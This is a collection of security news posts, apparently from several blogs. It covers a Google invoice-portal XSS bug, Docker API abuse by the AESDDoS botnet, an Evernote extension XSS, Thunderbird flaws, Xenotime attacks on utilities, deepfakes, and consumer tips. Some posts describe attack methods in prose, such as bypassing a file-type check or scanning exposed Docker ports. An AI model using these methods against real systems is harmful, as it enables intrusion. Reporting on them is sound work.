CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

XSS flaw would have allowed hackers access to Google’s network and impersonate its employees

Bug hunter Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to Google’s internal network

The Czech researcher Thomas Orlita discovered an XSS vulnerability in Google’s Invoice Submission Portal that would have allowed attackers access to part of Google’s internal network.

The Google Invoice Submission Portal is a public portal used by Google’s business partners to submit invoices.

An attacker could also exploit the flaw to steal Google employee cookies for internal apps and hijack accounts or send spear-phishing messages.

The attack was devised by the expert in February, and Google addressed the issue in mid-April after the researcher reported it to the tech giant.

Orlita explained that an attacker could have uploaded malformed files in the Google Invoice Submission Portal, via the Upload Invoice field.

The expert noticed that the ‘upload’ feature for actual invoice in PDF format could be abused to upload HTML files. The attacker had to intercept a request and change the uploaded file’s filename and Content-Type properties to HTML.

Using this trick it was possible to store malicious files in Google’s invoicing system and would have executed automatically when an employee tried to access it.

Google xss Invoice Submission Portal

“Since this is just a front-end validation, it doesn’t stop us from changing the file type when sending the upload POST request. Once we select any PDF file, an upload request is fired. We can intercept the request using a web proxy debugger and change the filename and the contents from .pdf to .html.” reads the analysis published by the expert.

Orlita uploaded an HTML file including an XSS payload that, when triggered, would send him an email every time it was loaded.

A few days later, the expert received an email message showing that the JavaScript code in the XSS payload had been executed on the domain.

This domain is used by Google for hosting internal websites and apps. If you attempt to access the domain you will be redirected to a Google Corp login page for Google employees that requires the authentication.

“The DOM of the page matches the XSS payload that was put instead of the PDF file. We can see that this URL is used for displaying a PDF file. But since the Content-Type of the uploaded file was changed from application/pdf to text/html, it displayed and rendered the XSS payload instead of the PDF.” continues the expert.

According to the researcher, it was possible to exploit the flaw to execute arbitrary code on behalf of Google employees and gain access to sensitive information.

The expert pointed out that many Google internal apps are hosted on the domain, making this issue a gift for the attackers,

Below the timeline for the flaw:

21.02.2019: Vulnerability reported
22.02.2019: Priority changed to P2 
22.02.2019: Added more information 
25.02.2019: Accepted and priority changed to P1 
06.03.2019: Reward issued 
26.03.2019: A fix has been implemented 
11.04.2019: Issue marked as fixed

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post XSS flaw would have allowed hackers access to Google’s network and impersonate its employees appeared first on Security Affairs.

“Human Error” Is The Biggest Corporate IT Issue

Here in, we feature stories of virus infection, phishing incidents and other issues involving private and public sectors because of external risks. However, IT troubles in companies are not really made by outsiders, but human error inside the organization. It is necessary to think about how employees really think about the notion of “do not leak information”, “don’t do this”, “don’t do that”. Too many rules to a point that people in the organization forget some of them, potentially doing something with the nasty result. It is not a walk-in-the-park for any company can recover from a very bad “human error”.

Below are types of human errors:

1. Human Error in Management

It may be difficult to understand what it means to say “management error”, examples are:

  • Lost of personal information after moving.
  • The confirmation of delivery of personal information is insufficient, and the personal information that should have been received is lost
  • Disclosure of information, management rules have not been clarified and have been disclosed by mistake

Even though there are information management rules and security policies in a company, management has not been done according to those rules. Or there is a possibility that such a rule has not been decided at all. This indicates that it is important for employees to undergo security education etc. thoroughly, and that management procedures regarding company information including personal information are important.

2. Misoperation

This is true for both emails and faxes. Entering wrong addresses, wrong content, wrong attachment, etc. This is one of the most common of all human errors. It is necessary to thoroughly educate employees on security so as not to make such mistakes.

3. Unauthorized access

Although the rate is low compared to mismanagement and mis-operation, external unauthorized access via the Internet is continuously performed, and its attack methods are also evolving. Since this is often accompanied by attacks such as malware, it is important to be careful as it leads to the stealing of a lot of personal information if it is damaged. Basic security measures such as install anti-virus software are important but not absolute measures against unauthorized access.

4. Lost and misplaced

It is a case that brings out information equipment such as a personal computer outside the work area, including the data it contains or it is lost/misplaced. Nowadays, tablet PCs and smartphones contain a lot of information, so it requires careful handling. It seems that it is frequent to get drunk and to leave it, but it is the worst thing. Because this lost/forgotten occurs at a high rate, it is necessary to take measures such as establishing strict rules for taking out data.

5. Unauthorized takeout and theft

To raise awareness for those who handle information. Implement a mechanism that can not be easily taken out by the information system, and that it can not be used even when taken out. This is based on the idea that access to information and security precautions should be addressed by both the person who uses it, the system that handles it, both are usually not enough in a typical organization.

Practical ways to prevent IT issues caused by “human errors”:

  • Information learned from the firm, should remain in the firm.Do not bring out information assets of companies or organizations outside. Specifically, take your laptop computer, USB memory, etc. home without permission. If permission is provided, make sure the storage devices are encrypted. This will prevent information leakage in the event that the laptop or storage device is lost.
  • Do not leave important documents on the desk, likewise never write critical information on post-it notes and never paste it on the monitor.
  • Do not leave the computer without locking the screen
  • Do not discard information assets easily without measures. Be sure to erase etc. Specifically, when discarding a PC, be sure to delete the data on the hard disk if not physically destroy the disk.
  • Do not inadvertently bring private equipment (PCs etc.) into the company, unless BYOD is allowed.
  • Lock and No Loan – Do not lend or transfer the rights given to an individual to others without permission
  • Prohibition of information – Do not profess the information you have learned on business without permission.

The post “Human Error” Is The Biggest Corporate IT Issue appeared first on .

Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and use them to deliver a malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware is active since at least since 2014 and it was used to build large DDoS botnet. in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and send it back to the C2, depending on the specific hardware configuration the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacker, mining cryptocurrency, etc.)

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

In order to secure Docker hosts admins should allow only trusted sources to access the Docker API, below some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”

Pierluigi Paganini

(SecurityAffairs – containers, hacking)

The post Crooks exploit exposed Docker APIs to build AESDDoS botnet appeared first on Security Affairs.

S&P Cautioned The US, Huawei Ban Bad For US Firms

In the ongoing trade war between the United States and China, embattled electronics firm Huawei found an ally from no other than Standard and Poors (S&P), a credit rating agency. S&P cautioned the United States of its strong Anti-Huawei stance, as it will likely have bad effects on the profitability of electronic component suppliers where Huawei buys from to build its fleet of smartphones and networking equipment. The Huawei ban as imposed by US companies in compliance with the President’s Executive Order may also motivate China to develop their internal industries, especially in the areas of supply chain and producing electronic spare parts.

“In turn, this could heighten competition in the technology sector and potentially lower the long-term growth prospects of US technology firms. In the next one to two years, we believe US semiconductor firms will take the biggest hit because many of them count Huawei as a key customer,” explained S&P Global Ratings credit analyst Mark Habib.

The United States government is pushing to cripple Huawei, which it believes to be under the direct supervision of the Beijing government. S&P believes that Huawei, though one of the vendors of 5G equipment is not the end all and be all of the 5G technology. The rating agency underscored that other vendors are equally capable of supplying the market with 5G-ready radios for smartphones and other devices.

“The ban adds a headwind to an industry in the middle of a correction due to weak demand after a strong 2018, above-average inventories both at manufacturers and in the supply chain, and elevated tariffs on Chinese imports under the current US-China trade dispute,” added Mark Habib.

Theoretically, the lost of Huawei means a gap with the availability of 5G radios will affect the global market. There is no assurance that the rest of the market can fill the void once Huawei officially releases their 5G products but are banned from entering the US market. S&P believes that both Europe and Asia will pick-up and fill the gap where Huawei used to be, especially in the US.

“If reports of a 5G gap are true, operators in markets facing Huawei restrictions could theoretically see higher equipment spending or delays in 5G implementation. But given the lack of value-added, 5G-ready use case applications, our forecast for 5G investment and customer appetite is bearish, so any incremental increase cost or delay should be nonmaterial to the ratings,” emphasized Mark Habib.

S&P believes that there is no immediate pressure for the world to immediately embrace 5G technology. It is normal for current mobile technology (LTE) to mature long enough. Though the credit rating agency also recognizes that when it comes to 5G roll-out Europe surely will be a laggard compared to the United States and the Asia-Pacific region.

Apple is a huge company that is largely dependent on the supply of Chinese-labor in order to manufacture iOS devices both on time and enough yields. S&P strongly disagrees that Apple can move-out of China for its manufacturing soon enough in full compliance with the President’s EO.

“The consequences for telecom are likely to vary from country to country and largely relate to longer-term 5G investment decisions, which give operators more time and options for managing the fallout,“ concluded Mark Habib.

Also Read:

Australia Doesn’t Want Huawei And Zte For Their 5G Networks

Huawei a Threat to Australia’s Infrastructure, Says Spy Chief

Huawei Roots for Cloud Computing to Ensure Data Protection

The post S&P Cautioned The US, Huawei Ban Bad For US Firms appeared first on .

5 Digital Risks to Help Your Teen Navigate this Summer

Snow cones.

Remember when summer was simple? Before smartphones and social networks, there was less uploading and more unwinding; less commenting and more savoring. 

There’s a new summer now. It’s the social summer, and tweens and teens know it well. It’s those few months away from school where the pressure (and compulsion) to show up and show off online can double. On Instagram and Snapchat, it’s a 24/7 stream of bikinis, vacations, friend groups, and summer abs. On gaming platforms, there’s more connecting and competing. 

With more of summer playing out on social, there’s also more risk. And that’s where parents come in. 

While it’s unlikely you can get kids to ditch their devices for weeks or even days at a time this summer, it is possible to coach kids through the risks to restore some of the simplicity and safety to summer.

5 summer risks to coach kids through:

  1. Body image. Every day your child — male or female — faces a non-stop, digital tidal wave of pressure to be ‘as- beautiful’ or ‘as-perfect’ as their peers online. Summer can magnify body image issues for kids.
    What you can do: Talk with your kids about social media’s power to subtly distort body image. Help kids decipher the visual world around them — what’s real, what’s imagined, and what’s relevant. Keep an eye on your child’s moods, eating habits, and digital behaviors. Are comments or captions focused only on looks? If so, help your child expand his or her focus. Get serious about screen limits if you suspect too much scrolling is negatively impacting your child’s physical or emotional health.
  2. Gaming addiction. The risks connected with gaming can multiply in the summer months. Many gaming platforms serve as social networks that allow kids to talk, play, and connect with friends all day, every day, without ever leaving their rooms. With more summer gaming comes to the risk for addiction as well as gaming scams, inappropriate content, and bullying.
    What you can do: Don’t ignore the signs of excessive gaming, which include preoccupation with gaming, anger, irritation, lying to cover playing time, withdrawal and isolation, exchanging sleep for gaming. Be swift and take action. Set gaming ground rules specific to summer. Consider parental control software to help with time limits. Remember: Kids love to circumvent time limits at home by going to a friend’s house to play video games. Also, plan summer activities out of the house and away from devices.
  3. Cyberbullying. Making fun of others, threatening, name-calling, exclusion, and racial or gender discrimination are all serious issues online. With more time on their hands in the summer months, some kids can find new ways to torment others.
    What you can do: Listen in on (monitor) your child’s social media accounts (without commenting or liking). What is the tone of your child’s comments or the comments of others? Pay attention to your child’s moods, behaviors, and online friend groups. Note: Your child could be the target of cyberbullying or the cyberbully, so keep your digital eyes open and objective.
  4. Smartphone anxiety. Anxiety is a growing issue for teens that can compound in the summer months if left unchecked. A 2018 survey from the Pew Research Center reveals that 56 percent of teens feel anxious, lonely, or upset when they don’t have their cell phones.
    What you can do:
    Pay attention to your child’s physical and emotional health. Signs of anxiety include extreme apprehension or worry, self-doubt, sleeplessness, stomach or headache complaints, isolation, panic attacks, and excessive fear. Establish screen limits and plan phone-free outings with your child. Set aside daily one-on-one time with your child to re-connect and seek out professional help if needed.
  5. Social Conflict. More hours in the day + more social media = potential for more conflict. Digital conflict in group chats or social networks can quickly get out of hand. Being excluded, misunderstood, or criticized hurts, even more, when it plays out on a public, digital stage.
    What you can do: While conflict is a normal part of life and healthy friendships, it can spiral in the online space where fingers are quick to fire off responses. Offer your child your ears before your advice. Just listen. Hear them out and (if asked) help them brainstorm ways to work through the conflict. Offer options like responding well, not engaging, and handling a situation face-to-face. Avoid the temptation to jump in and referee or solve.

Summer doesn’t have to be stressful for kids, and the smartphone doesn’t have to win the majority of your child’s attention. With listening, monitoring, and timely coaching, parents can help kids avoid common digital risks and enjoy the ease and fun of summer. 

The post 5 Digital Risks to Help Your Teen Navigate this Summer appeared first on McAfee Blogs.

4 Easy and Simple Ways To Secure Cloud Infra

Amazon Web Services, Microsoft Azure, Apple i-Cloud, Google Services, those are just four of the largest cloud-platforms competing for customer’s mind-share. All four of them alongside hundreds more minor vendors in this cloud computing market are trying to out-do each other, not just in pricing but also with how much they increase the user-friendliness of their UX (User Experience). Alongside promoting user-friendliness comes the very enemy of security, the “sense of convenience”. The more convenient the service is the more “leniency” is required for its implementation. The reverse is also true if more parts of the system require specific knowledge in order to proceed, it is much more secure indirectly speaking since the system tends to only have a few people knowing its under-the-hood operations.

For the system administrator trying to secure a cloud computing subscription, what can they do in order to mitigate the potential security gaps overlooked by the vendors? Here in, we provide you a few simple tips on how to increase cloud-platform security without changing your cloud vendor of choice:

  • Built an IT team with a qualified level of expertise in cloud computing technologies. If there are certain financial constraints that stop the firm from doing so, researching for an MSP (Managed Service Provider) with an industry-recognized track record of managing the cloud-platform on the firm’s behalf is the next best thing.
  • Maintain a reliable User Account Management, once the employee with an access privilege to the cloud infrastructure left the company, his/her account needs to be immediately disabled. Since cloud infrastructure are exposed on the Internet, the recently separated employee may still use the account and may cause problems in the long run if the user account is not disabled fast enough. Many cybersecurity issues are not really caused by malware or external hacker, but former employees that harbor ill feelings against their former employers. It is important for all organizations to have a fully proactive User Account Management methodology, as every former employee’s system access is an attack surface.
  • How fast the IT team responds to the problem is another good metric to improve. Most especially true for MSPs, as they are hired externally by the company to perform specific IT support services instead of hiring internal IT professionals, the tasks of system administrators are delegated to MSPs within a specific SLA (Service Level Agreement). One of the responses of a reliable MSP or internal IT team is the patching policy for computers. For Windows for example, Microsoft releases updates that fix bugs and security vulnerabilities every second Tuesday of the month. A dependable IT support team need not delay Windows Update, especially if it is not using legacy applications and legacy hardware.
  • A reliable cloud-infrastructure vendor will always have a clear policy when it comes to user file backups. Vendors will always promote their “amazing redundancy” as a feature for their services. An IT team worth its salt will perform further research about various vendors offering the same services. A well-researched decision is cheaper, safer and more secure for any company who wants to have a cloud infrastructure in place.

Also Read:

D-Link IP Camera’s Unencrypted Cloud Infra, Vulnerable to MiTM Attacks

Google’s Vulnerability Scanning for Their Cloud Infrastructure in Beta

The post 4 Easy and Simple Ways To Secure Cloud Infra appeared first on .

Evernote Critical Flaw Could Have Impacted Millions of Users

A critical flaw that affected Evernote’s web clipper extension for Chrome could have impacted millions of users.

Reports say that the critical flaw in the popular note-taking extension Evernote could have led to the breach of personal data of over 4.6 million users. Hackers could have exploited the vulnerability to steal personal data including emails and financial transactions of users.

Security researchers at Guardio had discovered this vulnerability in the Evernote Web Clipper extension, which is immensely popular and which lets users capture full-page articles, images, emails, selected texts etc.

A blog post by the Guardio research team says, “In May 2019 Guardio’s research team has discovered a critical vulnerability in Evernote Web Clipper for Chrome. A logical coding error made it is possible to break domain-isolation mechanisms and execute code on behalf of the user – granting access to sensitive user information not limited to Evernote’s domain. Financials, social media, personal emails, and more are all natural targets. The Universal XSS vulnerability was marked as CVE-2019-12592.”

The hackers exploiting the vulnerability could get users diverted to a website that’s controlled by them. Eventually, the hackers would be able to breach the users’ private data from affected 3rd-party websites. Guardio researchers have even demonstrated, in the PoC (Proof-of-Concept) access to social media, financial transaction history, private shopping lists etc. The Guardio researchers disclosed the flaw to Evernote on May 27 and following the disclosure, Evernote patched the vulnerability and a fixed version was deployed within a few days. The fix was confirmed on June 4th, 2019.

How the vulnerability gets exploited

In the normal course, a JavaScript is injected into the webpages that use the Evernote extension so as to enable the extension’s various functionalities. But, due to the above-mentioned vulnerability (CVE-2019-12592), logical coding error that has left a function (one that’s used to pass a URL from the site to the extension’s namespace) unsanitized, attackers could inject their own script into the webpages. This gives them access to sensitive user information available on the webpages.

The Guardio blog post says, “The exploit is triggered by the malicious website and causes Evernote’s internal infrastructure to inject an attacker-controlled payload into all iframes contexts…Injected payload is customized for each targeted website, able to steal cookies, credentials, private information, perform actions as the user and more.”

The Guardio researchers have also used a proof of concept video in which they explain how the user is first taken to the hacker-controlled malicious website (via social media, email, compromised blog comments etc) and how the malicious website then silently loads hidden, legitimate iframe tags of targeted websites. These iframe tags would have injected payload that would be customized for each targeted website. Thus, the hackers would be able to steal personal data from the targeted websites.

The solution

Users should go for the latest version of Evernote, which includes the fix for this issue. The latest version can be installed by copying chrome://extensions/?id=pioclpoplcdbaefihamjohnefbikjilc into the address bar. For security reasons it has to be manually copied; it’s to be ensured that the version shows as 7.11.1 or higher.
Users should also make it a point to install browser extensions only from trusted sources.

The post Evernote Critical Flaw Could Have Impacted Millions of Users appeared first on .

Xenotime threat actor now is targeting Electric Utilities in US and APAC

Experts at Dragos firm reported that Xenotime threat actor behind the 2017 Trisis/Triton malware attack is targeting electric utilities in the US and APAC.

Xenotime threat actor is considered responsible for the 2017 Trisis/Triton malware attack that hit oil and gas organizations.

In December 2017, the Triton malware  (aka Trisis) was discovered by researchers at FireEye, it was specifically designed to target industrial control systems (ICS) system.

Security experts at CyberX who analyzed samples of the malware provided further details on the attack, revealing that Triton was likely developed by Iran and used to target an organization in Saudi Arabia.

In October 2018, FireEye experts discovered a link between the Triton malware, tracked by the company as TEMP.Veles, and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), that is a Russian government research institute in Moscow.

Now, according to security firm Dragos, the group is targeting electric utilities in the United States and the Asia-Pacific (APAC) region.

“In February 2019, while working with clients across various utilities and regions, Dragos identified a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.” reads a blog post published by Dragos.

“This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.”

Xenotime has been active since at least 2014, its activity was discovered in 2017 after it caused a shutdown at a critical infrastructure organization somewhere in Saudi Arabia.

The group used a piece of malware known as Trisis, Triton and HatMan, and it targeted Schneider Electric’s Triconex safety instrumented systems (SIS) through a zero-day vulnerability. The attack was discovered after a SIS triggered a shutdown of some industrial systems, which experts believe hackers caused by accident.

Triton Xenotime

Dragos experts revealed that the attacks against entities in the United States and the APAC region were similar to ones that targeted organizations in the oil and gas sector. The good news is that all the attacks carried out by the Xenotime group failed into breaching the targeted organization.

“The activities are consistent with Stage 1 ICS Cyber Kill Chain reconnaissance and initial access operations, including observed incidents of attempted authentication with credentials and possible credential ‘stuffing,’ or using stolen usernames and passwords to try and force entry into target accounts.” continues the report.

Dragos warns that Xenotime poses a serious threat to electric utilities that uses ICS-SCADA systems similar to the ones in the oil and gas industries.

“Electric utility environments are significantly different from oil and gas operations in several aspects, but electric operations still have safety and protection equipment that could be targeted with similar tradecraft. XENOTIME expressing consistent, direct interest in electric utility operations is a cause for deep concern given this adversary’s willingness to compromise process safety – and thus integrity – to fulfill its mission.” continues the experts.

Dragos presented research on Xenotime at SecurityWeek’s 2018 ICS Cyber Security Conference held in Atlanta, below the video of the presentation:

“Dragos emphasizes that the observed behavior is an expansion, a proliferation of the threat, and not a shift – oil and gas entities must still grapple with this adversary’s activity.” concludes Dragos. “While unfortunate, the expansion should serve as a clear signal to ICS operators – not only in oil and gas or electric utility operations – that the time to plan, implement, and enforce security standards and response processes in industrial environments is now.”

Pierluigi Paganini

(SecurityAffairs – Triton malware, Xenotime)

The post Xenotime threat actor now is targeting Electric Utilities in US and APAC appeared first on Security Affairs.

Tips to Fix Pname Com Facebook Orca Error on Android

Android users sometimes receive pop-up messages on their screen, on Facebook, saying that Pname Com Facebook Orca has stopped, and this naturally makes them confused. When the pop-ups appear repeatedly, the users wouldn’t know what to do. Today, we discuss in detail this rather common issue, which is known as the Pname Com Facebook Orca error. We would also suggest some very easy tips to fix Pname Com Facebook Orca error.
Well, let’s begin by discussing what Pname Com Facebook Orca is. It’s actually the name of a smartphone Facebook messenger app. The Orca folder on an Android phone serves to store all the cache, plugins, videos audios, images, and files from this messenger app.

Next, let’s discuss the commonly noticed Facebook Orca Katana folder as well. This folder, which is one like the Orca folder, is for the Facebook app and is automatically created during the installation of the Facebook app. There’s, in fact, nothing to worry about the folder. This folder too, like the Orca folder, serves some purpose, discussing which is not of much relevance here.

Now, let’s get back to our topic, the Facebook Orca folder and go a bit more in-depth. Let us tell you, at the outset itself, that Pname Com Facebook Orca, though it seems like an issue for many users, is not a malware or anything that would cause you damage. Though the repeated appearance of the pop-up message could irritate you, Pname Com Facebook Orca, as we have already said, is just a folder that’s automatically created and serves some purpose as well.

The use of Pname Com Facebook Orca…

Pname Com Facebook Orca helps users retrieve messages or conversations that they had deleted from their Facebook messenger app. This is possible since the Pname Com Facebook Orca folder stores all files of Facebook messenger conversations. Well, that’s the reason why the Orca folder takes up so much of space on the phone as well.

Pname Com Facebook Orca Stopped!- What does it mean?

It’s really irritating when a user gets a pop-up message again and again saying that Pname Com Facebook Orca has stopped. While most people ignore the pop-ups, some tend to delete Pname Com Facebook Orca. Neither of these is the right solution. Ignoring won’t solve the issue. Deleting too wouldn’t solve it as it will be automatically regenerated and the pop-ups will start coming again. It’s a permanent solution that’s needed.

How to fix Pname Com Facebook Orca error permanently

Follow these steps to fix Pname Com Facebook Orca error permanently:

  • Go to ‘Settings’ on your Android device.
  • Next, go to the “Application” option, look for “All Apps” and click on it.
  • Select “Facebook App”
  • Clear all data
  • Restart Facebook app.

Following these steps would help fix Pname Com Facebook Orca error permanently. Once you reset your app, you won’t get the error message any longer.

But, in case the issue still persists, you need to uninstall the Facebook app on your device, restart the device and re-install Facebook app from Google Play Store. That would hopefully solve the issue.

Retrieving deleted messages from the Orca folder

If you want to see the Facebook Messenger messages that you have deleted, the “com.facebook.orca” folder helps you retrieve them. Here’s what you need to do to retrieve such deleted conversations:

  • Go to File Explorer or File Manager on your device. If you can’t find it on your phone, download and install from the Google Play store.
  • Open File Explorer and go to SD/Storage card. Open and look for the Android folder.
  • Open Android folder.
  • Open Data folder inside the Android folder.
  • Find the “com.facebook.orca” folder that is part of Facebook Messenger, click on it.
  • Go to the “Cache” folder.
  • Look for the “fb_temp” folder inside the Cache folder.
  • You can retrieve information on group and individual conversations from the backup copies for Facebook Messenger that would be there in the “fb_temp” folder.

Another method of retrieving messages from the “com.facebook.orca” folder is by connecting your phone to a computer using a USB cable and then locating the “com.facebook.orca” folder. From there you could go to “Cache”, then to “fb_temp” and finally get back your deleted messages.

The post Tips to Fix Pname Com Facebook Orca Error on Android appeared first on .

Mozilla addressed flaws in Thunderbird that allow code execution

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could allow code execution on impacted systems. 

Mozilla released security updates for the Thunderbird email client that address vulnerabilities that could be exploited by attackers to execute arbitrary code on impacted systems. 

Mozilla released Thunderbird version 60.7.1 that addresses three High severity vulnerabilities and one Low risk issue. 

The three High severity vulnerabilities addressed by Mozilla are:

  • CVE-2019-11703 – heap buffer overflow in the function icalparser.c;
  • CVE-2019-11704 – heap buffer overflow in the function icalvalue.c;
  • CVE-2019-11705 – stack buffer overflow in the function calrecur.c; 

The Low risk issue, tracked as CVE-2019-11706, is a type confusion in icalproperty.c. 

“Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit these vulnerabilities to take control of an affected system.” reads the advisory published by the US-CERT.

“The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.7.1 and apply the necessary update.” 

The vulnerabilities affect all the Thunderbird versions prior to 60.7.1.  

Depending on the user’s privileges, an attacker could carry out several malicious activities, such as installing malicious applications and creating new admin accounts. 

Mozilla credited the researcher Luis Merino of X41 D-Sec for the discovery of the above flaws. The vulnerabilities affect the implementation of iCal functions, they could be used to cause a crash of the system when processing specially crafted email messages.

The expert pointed out that the flaws cannot be triggered via email in Thunderbird because the scripting is disabled when reading mail. The issue could be exploitable in browser or browser-like contexts.

The good news is Mozilla is not aware of any attack exploiting the flaws in the wild.

Pierluigi Paganini

(SecurityAffairs – Thunderbird, hacking)

The post Mozilla addressed flaws in Thunderbird that allow code execution appeared first on Security Affairs.

Evite Experiences Data Breach

Online invitation service Evite notified users about a data breach of user data that included names, usernames, email addresses, passwords, and mailing addresses.

The company disclosed the breach following the release of the affected data on the dark web. A hacker claimed to have access to 10 million user accounts.

“We became aware of a data security incident involving potential unauthorized access to our systems in April 2019. We engaged one of the leading data security firms and launched a thorough investigation. The investigation potentially traced the incident to malicious activity starting on February 22, 2019. On May 14, 2019, we concluded that an unauthorized party had acquired an inactive data storage file associated with our user accounts,” the company announced on its website.

Evite assured users that social security numbers and financial information were not part of the data being sold. The company urged users to reset their passwords and to be on the lookout for suspicious activities.

For some tips for personal information best practices, click here.

Read Evite’s announcement here.

The post Evite Experiences Data Breach appeared first on Adam Levin.

US Lawmakers Hear Testimony on Concerns of Deepfakes

US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Swartzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, on raising concerns about the threat of  "deepfakes," according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis....Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent and senior fellow for Alliance for Securing Democracy at the German Marshall Fund Clint Watts was part of a four-person panel that testified before the lawmakers of the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Neiman Labs looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Malware a Serious Threat for Industrial Orgs

Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

